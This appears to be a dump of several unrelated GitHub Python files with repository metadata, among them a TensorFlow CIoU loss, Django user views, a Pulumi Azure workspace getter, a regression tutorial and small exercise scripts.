def bbox_ciou(boxes1, boxes2):
boxes1_coor = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2_coor = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
boxes1_area = boxes1[..., 2] * boxes1[..., 3]
boxes2_area = boxes2[..., 2] * boxes2[..., 3]
enclose_left_up = tf.maximum(boxes1_coor[..., :2], boxes2_coor[..., :2])
enclose_right_down = tf.minimum(boxes1_coor[..., 2:], boxes2_coor[..., 2:])
inter_section = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]#intersection
union_area = boxes1_area + boxes2_area - inter_area#union
iou = tf.math.divide_no_nan(inter_area, union_area)#intersection/union
left_up = tf.minimum(boxes1_coor[..., :2], boxes2_coor[..., :2])
right_down = tf.maximum(boxes1_coor[..., 2:], boxes2_coor[..., 2:])
c = tf.maximum(right_down - left_up, 0.0)
c = tf.pow(c[..., 0], 2) + tf.pow(c[..., 1], 2)
u = (boxes1[..., 0] - boxes2[..., 0]) * (boxes1[..., 0] - boxes2[..., 0]) + \
(boxes1[..., 1] - boxes2[..., 1]) * (boxes1[..., 1] - boxes2[..., 1])
d = tf.math.divide_no_nan(u, c)
ar_gt = tf.math.divide_no_nan(boxes2[..., 2] , boxes2[..., 3])
ar_pred = tf.math.divide_no_nan(boxes1[..., 2], boxes1[..., 3])
pi = tf.convert_to_tensor(np.pi)
ar_loss = tf.math.divide_no_nan(4.0, pi * pi ) * tf.pow((tf.atan(ar_gt) - tf.atan(ar_pred)), 2)
alpha = tf.math.divide_no_nan(ar_loss ,(1 - iou + ar_loss))
ciou_term = d + alpha * ar_loss
ciou = iou - ciou_term
ciou = tf.clip_by_value(ciou, clip_value_min=-1.0, clip_value_max=0.99)
return ciou
| [
"noreply@github.com"
] | mdrifaath786.noreply@github.com |
d37ef810b717ae73e12929618728d8b28a247649 | d471c59b8d18513f7963c301cf092664ac9ea2a9 | /PycharmProjects/python_basic_language/lambda.py | 0f094c16edd2262a753af0df342fb59e34b7a6a9 | [] | no_license | kinqston34/python_program | 296dd0e4aedded5aea9e17c2610b7f8ec6115f21 | 39f1b622804698611caf368c507153e4c77ad0fe | refs/heads/main | 2023-08-21T12:24:14.520036 | 2021-10-21T06:58:35 | 2021-10-21T06:58:35 | 383,711,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def func(x,y,z):
return x+y+z
print(func(1,2,3))
#---------------------
func2 = lambda x,y,z : x+y+z
print(func2(2,4,6))
#---------------------
def func(n):
if n % 2 == 0:
print("偶數")
else:
print("奇數")
func2 = lambda n : "偶數" if n % 2 == 0 else "奇數"
print(func2(7777))
| [
"aa37741867@gmail.com"
] | aa37741867@gmail.com |
ff703a03633c91f322cfbf4945e385b28e55c3bc | 942252695ed89a6e7e1639d03ec4bcef39494112 | /cnn-image-classification/data_helpers.py | a29726e18853b6779e84f54a9a30214f654bacf7 | [] | no_license | hanke3/classification | 9f9073e50f9a12d55bb0abcc8ea6455d3aa64147 | c634647dda8db3ca038101b01829ca943e99cac5 | refs/heads/master | 2020-07-12T17:44:29.078729 | 2018-04-19T15:48:30 | 2018-04-19T15:48:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | import numpy as np
import glob, os
from skimage import io, transform
def load_train_valid_data(data_directory, validation_percentage, image_size):
# 加载数据
print('Loading data...')
x, y = load_images_and_labels(data_directory)
print('Total images: {:d}'.format(len(y)))
# 随机混淆数据
np.random.seed(10)
shuffle_indexes = np.random.permutation(np.arange(len(y)))
x_shuffled = x[shuffle_indexes]
y_shuffled = y[shuffle_indexes]
# 划分train/test集
validation_indexes = -1 * int(validation_percentage * len(y))
if validation_indexes == 0:
validation_indexes = -1
x_train, x_valid = x_shuffled[:validation_indexes], x_shuffled[
validation_indexes:]
y_train, y_valid = y_shuffled[:validation_indexes], y_shuffled[
validation_indexes:]
print('train/valid split: {:d}/{:d}'.format(len(x_train), len(x_valid)))
print('')
return read_images(x_train, image_size), read_images(
x_valid, image_size), y_train, y_valid
def load_images_and_labels(data_directory):
images = [] # 存储所有图片的路径
labels = [] # 每个图片对应的标签
sub_dirs = [sub[0] for sub in os.walk(data_directory)] # 获取所有子目录
# 获取每个子目录的图片
for i, sub_dir in enumerate(sub_dirs):
# 跳过当前根目录
if i == 0:
continue
# 获取当前子目录下的有效图片名称
dir_images = [] # 存储当前目录下的图片用于添加标签
exts = ['jpg', 'jpeg', 'JPG', 'JPEG']
dir_name = os.path.basename(sub_dir) # 获取路径的最后一个目录名
for ext in exts:
image_glob = os.path.join(data_directory, dir_name, '*.' + ext)
dir_images.extend(glob.glob(image_glob))
images.extend(dir_images)
# 添加对应标签
label = [0] * (len(sub_dirs) - 1)
label[i - 1] = 1
labels.extend([label for _ in dir_images])
return np.array(images), np.array(labels)
def read_images(images, image_size):
result = []
print('\nReading images:')
for i, im in enumerate(images):
# print(str(i) + ' ' + im)
img = io.imread(im)
img = transform.resize(img, (image_size, image_size))
result.append(img)
return result
def batch_iter(data, batch_size, num_epochs, shuffle=True):
data = np.array(data)
data_size = len(data)
num_batches_per_epoch = int((data_size - 1) / batch_size) + 1
for _ in range(num_epochs):
if shuffle:
shuffle_indexes = np.random.permutation(np.arange(data_size))
data = data[shuffle_indexes]
for batch_num in range(num_batches_per_epoch):
start_index = batch_num * batch_size
end_index = min(start_index + batch_size, data_size)
yield data[start_index:end_index]
if __name__ == '__main__':
data_directory = './data/flower_photos/'
load_train_valid_data(data_directory, 0.1, 28)
| [
"984209543@qq.com"
] | 984209543@qq.com |
85760c7b0528d6889d1cf43b7eefd78ed695ab1a | e59f696a96f216cdeea8d638f05b75bb0c26ef55 | /4 Python_Programs/4 Problems on pattern printing/Program_17/Demo.py | e956a8e0ab0a7ab73a0efc26905055e9ebf05ea3 | [] | no_license | Aditya-A-Pardeshi/Coding-Hands-On | 6858686bdf8f4f1088f6cc2fc0035a53c4875d81 | 0d72d45e92cb0698129636412f7bf5a8d865fd2f | refs/heads/main | 2023-05-29T05:35:34.052868 | 2021-06-14T18:52:57 | 2021-06-14T18:52:57 | 376,928,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | '''
Accept number of rows and number of columns from user and display below
pattern.
Input : iRow = 3 iCol = 4
Output :
1 2 3 4
5 6 7 8
9 10 11 12
'''
def Display(row,col):
no = 1;
if(row<0):
row = -row;
if(col<0):
col = -col;
for i in range(row,0,-1):
for j in range(0,col):
print(no,end = " ");
no = no + 1;
print("");
def main():
row = int(input("Enter row value: "));
col = int(input("Enter column value: "));
Display(row,col);
if __name__ == "__main__":
main(); | [
"adityapardeshi0078@gmail.com"
] | adityapardeshi0078@gmail.com |
61c46f8fe132afc892a621b3c9e20f9587f13a78 | f30b91db647dca1f77fffa4b7e26b6c6a68abbc6 | /8_kyu/Geometry Basics: Distance between points in 2D/distance_between_points.py | f6923c4d49f908ea1a428b1771bf931288251673 | [] | no_license | estraviz/codewars | 73caf95519eaac6f34962b8ade543bf4417df5b7 | 5f8685e883cb78381c528a0988f2b5cad6c129c2 | refs/heads/master | 2023-05-13T07:57:43.165290 | 2023-05-08T21:50:39 | 2023-05-08T21:50:39 | 159,744,593 | 10 | 55 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | """Geometry Basics: Distance between points in 2D
"""
from math import hypot
def distance_between_points(a, b):
return hypot(a.x - b.x, a.y - b.y)
| [
"javier.estraviz@gmail.com"
] | javier.estraviz@gmail.com |
86961c0157bd2cf6a3df6b8b6c798751c6d2f2ca | ce8a52a91d69aac8d1ebd597c4234d677b6a85ec | /users/views.py | 1e02ca728641f7716df02b4bef303455b28dd38d | [] | no_license | Yazanmuf/django-project | 702b54d8c6faa00960ebd1fb5078d97c358d526e | 5d82d054f14c07147544554e6e4ab3a3ab6db413 | refs/heads/master | 2020-03-31T18:55:14.022390 | 2018-10-13T22:58:27 | 2018-10-13T22:58:27 | 152,478,066 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,360 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, ProfileUpdateForm, UserUpdateForm
def register(request):
if request.method =='POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
messages.success(request, f'Your account has been created!')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
if request.method =='POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context ={
'u_form' : u_form,
'p_form' : p_form,
}
return render(request, 'users/profile.html', context)
| [
"ymufleh@gmail.com"
] | ymufleh@gmail.com |
b8a36168d13594a00333c7f951c11beaa75d402a | 82ca891008793f570668a7f2c760ae0f22d40494 | /src/VAMPzero/Component/Fuselage/Aerodynamic/cD0c.py | 58d77c91fd0adbc2cce1979d98d9018b2d3fadb0 | [
"Apache-2.0"
] | permissive | p-chambers/VAMPzero | 22f20415e83140496b1c5702b6acbb76a5b7bf52 | 4b11d059b1c7a963ec7e7962fa12681825bc2f93 | refs/heads/master | 2021-01-19T10:49:06.393888 | 2015-06-24T10:33:41 | 2015-06-24T10:33:41 | 82,208,448 | 1 | 0 | null | 2017-02-16T17:42:55 | 2017-02-16T17:42:55 | null | UTF-8 | Python | false | false | 2,300 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright: Deutsches Zentrum fuer Luft- und Raumfahrt e.V., 2015 (c)
Contact: daniel.boehnke@dlr.de and jonas.jepsen@dlr.de
'''
from VAMPzero.Handler.Parameter import parameter
class cD0c(parameter):
'''
Component zero lift drag coefficient of the fuselage
:Unit: [ ]
:Wiki: http://en.wikipedia.org/wiki/Drag_coefficient
'''
def __init__(self, value=0., unit='', parent='', cpacsPath=''):
super(cD0c, self).__init__(value=value, unit=unit, doc=self.__doc__, status='init', parent=parent,
cpacsPath=cpacsPath)
def calc(self):
'''
Calculates the zero lift drag coefficient from the wetted area and the friction coefficients
:Source: Aircraft Design: A Conceptual Approach, D. P. Raymer, AIAA Education Series, 1992, Second Edition, p. 281, Eq. 12.24
.. todo:
calc CD0c: find equation for estimate laminar / turbulent transition point
'''
wetArea = self.parent.wetArea.getValue()
cfLAM = self.parent.cfLAM.getValue()
cfTURB = self.parent.cfTURB.getValue()
formFactor = self.parent.formFactor.getValue()
dragArea = self.parent.dragArea.getValue()
nLam = self.parent.nLam.getValue()
return self.setValueCalc((nLam * cfLAM + (1 - nLam) * cfTURB) * formFactor * wetArea + dragArea)
###################################################################################################
#EOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFEOFE#
################################################################################################### | [
"daniel.boehnke@dlr.de"
] | daniel.boehnke@dlr.de |
a1aa2aa3a36845ae772f870971bceef5bb569802 | be75ec9fdb9a1c972a336b0d56b748e530f73e64 | /jour5/exo1/connection.py | 685f643f5305ad29c0ae91deb47faec406adb4f2 | [] | no_license | linda-jemni/Python-Linda-Jemni | bdb6cffa0c9a4a0f42d22ae2ef2b975e6d839fbd | 793165092e37223b6db761f2697ba2a6c2ff52c8 | refs/heads/master | 2023-01-29T20:47:13.883261 | 2020-12-11T14:57:14 | 2020-12-11T14:57:14 | 319,301,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 461 | py | import sqlite3
from sqlite3 import Error
def create_connection(db_file):
connx = None
try:
connx = sqlite3.connect(db_file)
return connx
except Error as e:
print(e)
return connx
def create_table(conn, create_table_sql):
try:
cu = conn.cursor()
cu.executescript(create_table_sql)
except Error as e:
print(e)
if __name__ == '__main__':
cnnx = create_connection("db_exo1.db") | [
"linda@gmail.com"
] | linda@gmail.com |
e07afaa7913aa1174d7b1fec1f1178ee1145a5c1 | 96c68bae89e82ede1f98d49bae68a7c394397454 | /producer/twitterCrdExample.py | 62346ae14f1a2897051920d0dddcdba932ace3aa | [] | no_license | llopacki/twitterapp | e22cf68072ee043f6ea44e55a31bf18d3b772c0c | 2f36b22f202e4bd817e9eca1e4e7e8f940bb496f | refs/heads/master | 2022-11-16T08:06:36.129781 | 2019-09-16T18:17:19 | 2019-09-16T18:17:19 | 208,598,219 | 0 | 2 | null | 2022-11-03T00:24:50 | 2019-09-15T13:28:07 | Python | UTF-8 | Python | false | false | 338 | py | ## AWS credentials
## twitterCrd.py
## This is a stub for twitterCrd.py file (not committed into the git repo
## Remember to create twitterCrd.py file with following content with your twitter developer creds
consumer_key = "FillThisOut"
consumer_secret = "FillThisOut"
access_token_key = "FillThisOut"
access_token_secret = "FillThisOut" | [
"leslaw@lopacki.net"
] | leslaw@lopacki.net |
cd963e4397fff6a989fbdd6cd2a95fffb0e8afb2 | 46e9b1c288d0dd5f627af376d7660903bc0e715f | /three_function.py | 74c70f34d511fab9ba2a45ac0e11fe5d08b6304a | [] | no_license | doktorkto/AU | 3e075f1cf9c5ba6254c0c210f057cb9bf5a92da9 | 77a04c779270bec467cfa8637bfa683690e726ae | refs/heads/master | 2021-07-15T14:54:15.256777 | 2020-09-28T07:51:21 | 2020-09-28T07:51:21 | 212,978,983 | 0 | 0 | null | 2019-12-18T08:10:44 | 2019-10-05T10:07:36 | null | UTF-8 | Python | false | false | 456 | py | def gcd(a, b):
if b == 0:
return a
else:
return gcd(b, a % b)
def bezout(a, b):
if not b:
return (1, 0, a)
y, x, g = bezout(b, a % b)
return (x, y - (a // b) * x, g)
def phi(n):
result = n
for i in range(2, n):
if n % i == 0:
while n % i ==0:
n /= i
result -= result / i
if n > 1:
result -= result / n
return result
| [
"noreply@github.com"
] | doktorkto.noreply@github.com |
6a28e526071a3ed9e27c052baf196cfc9543df92 | 742b958155434ce081f736153a11d4642b1e91c8 | /src/plugins/widgets/author/AuthorWidget.py | a097ef8da2345c21542c5185f05d397b2e4100a0 | [] | no_license | MozzieCN/alienblog | 5bb2b54653d24c90e2b14564ffe71a7e008b6a9c | cb2bbe76e61284d8c68e922b48c0bf0ca0e0970c | refs/heads/master | 2016-09-06T11:32:54.524664 | 2011-12-04T16:07:36 | 2011-12-04T16:07:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,353 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# plugins.widgets.author.AuthorWidget.py
#
# Copyright 2011 feiyd
#
# Created on 2011-11-25
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
from contrlib import plugin
class AuthorWidget(plugin.Widget):
author_url='http://www.gravatar.com/avatar/%s?s=%d&r=X&d=%s'
def __init__(self):
plugin.Widget.__init__(self,'system.author.info')
def parse(self,**kwords):
mail = kwords.pop('mail')
width = kwords.pop('width',32)
height = kwords.pop('height',32)
cls = kwords.pop('avatar-class','avatar')
if mail :
#什么什么的运算
pass
mail = '98b58b690d0016861c6ee4c494f6677b'
from alien.htmlwappers import Img,Div,tag,A
img = Img(**{'class':cls})
img.width=width
img.height=height
img.alt='default'
img.src=self.author_url % (mail,width,'default-png')
cls = kwords.pop('author-info-class','fn')
url = kwords.pop('url','www.baidu.com')
name = kwords.pop('name','呵呵')
author_info=tag('cite',**{'class':cls})
if not url:
author_body = name
else:
author_body=A(body=name,
**{
'rel':'external nofollow',
'href':url
}
).render()
author_info.body=author_body
return '%s\r\n%s'%(img.render(),author_info.render())
| [
"feiyd000@gmail.com"
] | feiyd000@gmail.com |
df381849a14e46f5c7966add3272a9fb8d3c4827 | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/batchai/latest/get_workspace.py | fc07e25056127bae987a2af869402c135333a479 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 5,336 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWorkspaceResult',
'AwaitableGetWorkspaceResult',
'get_workspace',
]
@pulumi.output_type
class GetWorkspaceResult:
"""
Batch AI Workspace information.
"""
def __init__(__self__, creation_time=None, location=None, name=None, provisioning_state=None, provisioning_state_transition_time=None, tags=None, type=None):
if creation_time and not isinstance(creation_time, str):
raise TypeError("Expected argument 'creation_time' to be a str")
pulumi.set(__self__, "creation_time", creation_time)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if provisioning_state_transition_time and not isinstance(provisioning_state_transition_time, str):
raise TypeError("Expected argument 'provisioning_state_transition_time' to be a str")
pulumi.set(__self__, "provisioning_state_transition_time", provisioning_state_transition_time)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
Time when the Workspace was created.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def location(self) -> str:
"""
The location of the resource
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioned state of the Workspace
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="provisioningStateTransitionTime")
def provisioning_state_transition_time(self) -> str:
"""
The time at which the workspace entered its current provisioning state.
"""
return pulumi.get(self, "provisioning_state_transition_time")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
The tags of the resource
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource
"""
return pulumi.get(self, "type")
class AwaitableGetWorkspaceResult(GetWorkspaceResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWorkspaceResult(
creation_time=self.creation_time,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
provisioning_state_transition_time=self.provisioning_state_transition_time,
tags=self.tags,
type=self.type)
def get_workspace(resource_group_name: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWorkspaceResult:
"""
Use this data source to access information about an existing resource.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str workspace_name: The name of the workspace. Workspace names can only contain a combination of alphanumeric characters along with dash (-) and underscore (_). The name must be from 1 through 64 characters long.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:batchai/latest:getWorkspace', __args__, opts=opts, typ=GetWorkspaceResult).value
return AwaitableGetWorkspaceResult(
creation_time=__ret__.creation_time,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
provisioning_state_transition_time=__ret__.provisioning_state_transition_time,
tags=__ret__.tags,
type=__ret__.type)
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
04cda7ae9c02f4f7624eb6a296b392c87820e95d | b764137fd91d53a2abc2fa2ff29070a1e3eccfa9 | /datamol/utils/perf.py | d2aef2aff9e2a049d646a855a98ed6453d7b90e3 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | datamol-io/datamol | dca3449e07d3921e3075292271cbbdd96a8d8297 | 2619c610a6dfbf7cfc2a17f6619fecb5e3eee61b | refs/heads/main | 2023-07-27T16:35:17.909994 | 2023-07-27T15:39:23 | 2023-07-27T15:39:23 | 341,603,042 | 74 | 12 | Apache-2.0 | 2023-09-04T13:10:51 | 2021-02-23T15:39:33 | Python | UTF-8 | Python | false | false | 1,885 | py | import time
from loguru import logger
duration_intervals = (
("weeks", 604800), # 60 * 60 * 24 * 7
("days", 86400), # 60 * 60 * 24
("h", 3600), # 60 * 60
("min", 60),
("s", 1),
("ms", 1e-3),
("us", 1e-6),
)
def human_duration(seconds: float, granularity: int = 1):
# NOTE(hadim): far from being perfect.
result = []
duration: float = seconds
for name, count in duration_intervals:
value = duration // count
if value:
duration -= value * count
result.append(f"{value:.0f}{name}")
return ", ".join(result[:granularity])
class watch_duration:
"""A Python decorator to measure execution time with logging capability.
Args:
log: Whether to log the measured duration.
log_human_duration: Whether to log duration in a human way
depending on the amount.
Example:
```python
def fn(n):
for i in range(n):
print(i)
time.sleep(0.2)
with dm.utils.perf.watch_duration(log=True) as w:
fn(5)
print(w.duration)
```
"""
def __init__(self, log: bool = True, log_human_duration: bool = True):
self.log = log
self.log_human_duration = log_human_duration
self.start = None
self.end = None
self.duration = None
self.duration_minutes = None
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *_):
assert self.start is not None
self.end = time.time()
self.duration = self.end - self.start
self.duration_minutes = self.duration / 60
if self.log:
if self.log_human_duration:
logger.info(f"Duration {human_duration(self.duration)}.")
else:
logger.info(f"Duration {self.duration_minutes:.2f} minutes")
| [
"hadrien.mary@gmail.com"
] | hadrien.mary@gmail.com |
96ea20bb9984d253e19134cd2d3507cf14a9e719 | 6529e4dd8be00788f24aa46ed079d3959c28b4b8 | /Case Studies/Regression Analysis/Regression.py | 672fbe20cdacb6144b5c0cef107e26039765db5a | [] | no_license | jmalisano/Using_Python_for_Research | f3e80b443dec5767a19e6c629ff94210a6ac7930 | 065eb995c2eab5f31aab70ecfece3c98fb627d5a | refs/heads/main | 2023-01-18T16:20:10.065500 | 2020-11-08T18:11:02 | 2020-11-08T18:11:02 | 311,122,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,705 | py | import numpy as np
import scipy.stats as ss
import matplotlib.pyplot as plt
#generate synthetic data
n = 100
beta_0 = 5
beta_1 = 2
np.random.seed(1)
x = ss.uniform.rvs(size = n)*10 #100 random variables between 0 and 10
y = beta_0+beta_1*x + ss.norm.rvs(loc=0, scale=1, size=n) #y=mx+c+noise. It is assumed that y=mx+c is the
plt.figure()
plt.plot(x,y, "o", ms=5)
xx = np.array([0, 10]) #lowest and highest x
plt.plot(xx, beta_0 + beta_1 * xx)
def compute_rss(y_estimate, y):
return sum(np.power(y-y_estimate, 2))
def estimate_y(x, b_0, b_1):
return b_0 + b_1 * x
#rss = compute_rss(estimate_y(x, beta_0, beta_1), y)
#we are attempting to estimate least squares
#in this we are pretendeding we already know beta0
rss = []
slopes = np.arange(-10, 15, 0.01)
for slope in slopes:
rss.append(np.sum((y - beta_0 - slope*x)**2)) #y - beta_0 - slope*x gives us difference between predicted y and observed y, doing for a range of slopes
ind_min = np.argmin(rss) #findex the index of the rss array that has the min value
#print("estimate for slope:", slopes[ind_min])
#an easier method to find the slope is as follows
import statsmodels.api as sm
mod = sm.OLS(y,x) #x are the predictor values
est = mod.fit()
print(est.summary())
X = sm.add_constant(x) #same as x but include colum of 1s
mod=sm.OLS(y,X)
est = mod.fit()
print(est.summary())
n = 500
beta_0 = 5
beta_1 = 2
beta_2 = -1
np.random.seed(1)
#generates random scatter of x1 and x2
x_1 = 10 * ss.uniform.rvs(size=n)
x_2 = 10 * ss.uniform.rvs(size=n)
#outcome
y = beta_0 + beta_1*x_1 + beta_2*x_2 + ss.norm.rvs(loc=0, scale=1, size=n)
#take x1 and x2 and stack as columns in a matrix
X = np.stack([x_1, x_2], axis=1)
from mpl_toolkits.mplot3d import Axes3D
fig=plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:,0], X[:,1], y, c=y)
from sklearn.linear_model import LinearRegression
lm = LinearRegression(fit_intercept=True)
lm.fit(X,y)
print(f"intercept: {lm.intercept_}")
print(f"coefficients [x1,x2]: {lm.coef_}")
#predict value of outcome for some X
X_0 = np.array([2,4]) #take x1=2, x2=4
lm.predict(X_0.reshape(1, -1))
lm.score(X, y) #finds R2, takes input X, generates prediction of y, compares outcome with actual y
#ASSESSING MODEL ACCURACCY
#Mean squared error (MSE) is most common way to assess accuraccy
#how to split data to training and test
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.5, random_state=1)
lm = LinearRegression(fit_intercept=True) #creates a model object
lm.fit(X_train, y_train) #fits training data
wlm.score(X_test, y_test) #takes input X data (test), then compares outputs to test Ys
| [
"julian.malisano@gmail.com"
] | julian.malisano@gmail.com |
a88bef576b03596e2e500519c246aa0f8c42b851 | 36eed51b5a456e3f239ff47a7f29a24b3fc2602e | /gmuwork/stamp/MASS_algorithm_testing.py | 23849969cbd53a04c9387adc65e3175076520bc0 | [] | no_license | rajivsarvepalli/Python-Projects | ad4b07563a647837146b877475606ceff2e2e2ed | 9655e64e10928598c821db0852275ba9712f9371 | refs/heads/master | 2023-01-29T14:27:09.777044 | 2020-12-13T02:13:15 | 2020-12-13T02:13:15 | 98,135,265 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,853 | py | import numpy as np
import matplotlib.pyplot as plt
from gmuwork.shortcuts import quick_txt_reader
from scipy.spatial import distance
import time
from gmuwork.shortcuts import quick_txt_reader
from MASS_algorithm_development import STAMP
from multiprocessing import Pool,freeze_support
from itertools import repeat
import matplotlib.pyplot as plt
def fft_time(X):
from scipy.fftpack import fft,ifft
X=np.fft.fft(X)
start = time.time()
np.fft.ifft(X)
print(time.time()-start)
if __name__=="__main__":
import scipy.io as sio
from gmuwork.shortcuts import quick_txt_reader
matfile = sio.loadmat("C:/Users/Rajiv Sarvepalli/Downloads/testData.mat")
data = matfile['data'][0]
# for x in range(0,142):
# data+=[2,2,2,2,2,5,5,5,5,5,6,6,6,6,6,6,8,8,8,8,8,9,9,9,9,9,8,8,8,8,8,6,6,6,6,6,5,5,5,5,5,2,2,2,2,2]
# data = np.insert(data,2500,[10,11,12,13,14,15,16,17,
# 18,19,20,21,22,23,24,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10])
# data = np.insert(data,1000,[10,10,10,10,10])
# data = np.insert(data,4500,[10,11,11,11,11,11,11,11,11,11,10])
AtoA = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/AtoA.txt.npy")
AtoM = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/AtoM.txt.npy")
print(np.max(AtoA))
print('loc: ',np.argmax(AtoA))
print(np.max(AtoM))
print('loc: ',np.argmax(AtoM))
testDataStamp = np.load("C:/Users/Rajiv Sarvepalli/Projects/Data for GMU/tests/testDataStamp.npy")
testdataMAtrixprolfile = testDataStamp[0]
print(len(testdataMAtrixprolfile))
times = [x for x in range(0,len(data))]
plt.figure(figsize=(30,5))
plt.plot(times,data,c='r')
times = [x for x in range(0,len(testdataMAtrixprolfile))]
plt.figure(figsize=(30,5))
plt.plot(times,testdataMAtrixprolfile,c='b')
plt.show()
| [
"rajiv@ericavijay.net"
] | rajiv@ericavijay.net |
2ee77e9b6aabad5c58fa02cfc6ef96cf487ee72e | 978f28b5845599e6682d578246b20129a77df2c4 | /Arrays/Swap Minimum.py | 936260b72d2a83aa8bc412649ee6df0e497bbe7d | [] | no_license | mdrijwan123/Python-Programs | bfa48e35c1a4172bb5ed2cbb604497693b8d79ca | dae67e7f83fc786a33933c0cb7315246dbef9432 | refs/heads/master | 2021-07-08T03:29:08.319918 | 2021-04-18T07:58:55 | 2021-04-18T07:58:55 | 240,065,567 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,147 | py | # Python3 program to find the minimum number
# of swaps required to sort an array
# of distinct element
# Function to find minimum swaps to
# sort an array
def findMinSwap(arr, n):
# Declare a vector of pair
vec = []
for i in range(n):
vec.append([arr[i], i])
# Sort the vector w.r.t the first
# element of pair
vec = sorted(vec, reverse=True)
